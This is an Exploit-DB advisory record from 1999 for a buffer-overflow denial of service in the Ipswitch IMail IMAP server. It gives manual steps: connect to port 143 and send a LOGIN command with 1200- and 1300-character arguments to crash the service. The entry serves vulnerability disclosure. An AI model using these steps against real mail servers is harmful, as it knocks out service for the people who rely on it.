Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability

1999-03-01T00:00:00
ID EDB-ID:19377
Type exploitdb
Reporter Marc of eEye
Modified 1999-03-01T00:00:00

Description

Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability. CVE-1999-1557. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/502/info

The imapd login process is susceptible to a buffer overflow attack which will crash the service. 


Telnet to target machine, port 143
* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2

Where glob1 is 1200 characters and glob2 is 1300 characters.